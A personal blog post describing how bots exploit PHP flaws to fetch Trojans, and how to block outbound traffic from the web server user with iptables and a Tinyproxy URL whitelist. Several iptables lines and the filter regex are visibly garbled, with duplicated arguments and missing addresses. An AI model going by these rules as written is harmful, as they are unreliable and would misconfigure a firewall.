Claus Beerta

Securing your Web server against Bots

Bots usually operate in a fairly similar way to get onto your server:

  • They exploit a known vulnerability in a PHP script to inject some code
  • This injected code is usually very simple, downloading the Trojan from a remote address with curl or wget to a temporary directory
  • After the Trojan has been downloaded, it is then being executed through the PHP vulnerability

A method I’ve employed in the past to at least stop these automated spreads of Trojans is by adding iptables rules that forbid the User that the Web server is running as to do any connects to the outside world:

# Allow Everything local
iptables -A OUTPUT -o lo+ -A OUTPUT -o lo+ -A OUTPUT -o lo+ -m owner --uid-owner 33 -j ACCEPT
iptables -A OUTPUT -d -p tcp -m owner --uid-owner 33 -j ACCEPT
# Allow DNS Requests 
iptables -A OUTPUT -p udp -m owner --uid-owner 33 -m udp --dport 53 -j ACCEPT
# Allow HTTP Answers to clients requesting stuff from the Web Server (HTTP+HTTPS)
iptables -A OUTPUT -p tcp -m owner --uid-owner 33 -m tcp --sport 80 -j ACCEPT
iptables -A OUTPUT -p tcp -m owner --uid-owner 33 -m tcp --sport 443 -j ACCEPT
# Log everything that gets dropped
iptables -A OUTPUT -m owner --uid-owner 33 -m limit --limit 5/sec -j LOG --log-prefix "www-data: "
# and finally drop anything that tries to leave
iptables -A OUTPUT -m owner --uid-owner 33 -j REJECT --reject-with icmp-port-unreachable

# Force outgoing request through http proxy on port 8080
iptables -t nat-A OUTPUT -p tcp -A OUTPUT -p tcp -A OUTPUT -p tcp -m owner --uid-owner 33 -m tcp --dport 80 -j DNAT --to-destination

“But now all my RSS Clients, and HTTP Includes won’t work anymore” There is two ways around the fact that now nothing on your web server is allowed to talk to the evil internet anymore:

  1. Insert `ACCEPT` rules into the iptables chain to the destinations you want to allow. This method is tedious, and error prone as you need to constantly be aware what ip’s the services you’re using have and update your iptables rules accordingly.
  2. Using a simple HTTP Proxy to pass through the requests you want to allow.

I’ve always preferred the HTTP Proxy method, while it may be a bit more work to setup in the first place, the added security is worth it, since you can allow on an url basis you don’t need to worry about the remote side changing ip’s anymore, as well as that if you allow ip’s with iptables, people can upload their Trojans to these web servers and bypass all your fancy protection.

A good proxy to use that allows for extensive filtering and is still small footprint is Tinyproxy, a few settings you want to tune are:

# Only Listen on Localhost

# Allow requests from your local server only
Allow <Official IP Address of your server>

# Enable Filtering, and deny everything by default
Filter "/etc/tinyproxy/filter"
FilterURLs On
FilterExtended On
FilterDefaultDeny Yes

Looking at your Tinyproxy logfiles, you should now see requests beeing denied if you access a page on the Web server that tries to include external resouces:

CONNECT   Aug 01 05:11:57 [16731]: Connect (file descriptor 7): []
CONNECT   Aug 01 05:11:57 [16731]: Request (file descriptor 7): GET /1.0/user/cb0amg/recenttracks.rss HTTP/1.0
INFO      Aug 01 05:11:57 [16731]: process_request: trans Host GET for 7
NOTICE    Aug 01 05:11:57 [16731]: Proxying refused on filtered url ""
INFO      Aug 01 05:11:57 [16731]: Not sending client headers to remote machine

Voila, my Wordpress installation tried to grab the recent track RSS from, i want to allow that so I’ll just add this to my Tinyproxy filter rule:

^* ^* ^*

Now anything you want your Web Server to access, you can simply add to your Tinyproxy filter.

Remember though, this is not a blanket protection against any software flaw that exists! You should still keep your software updated at all times.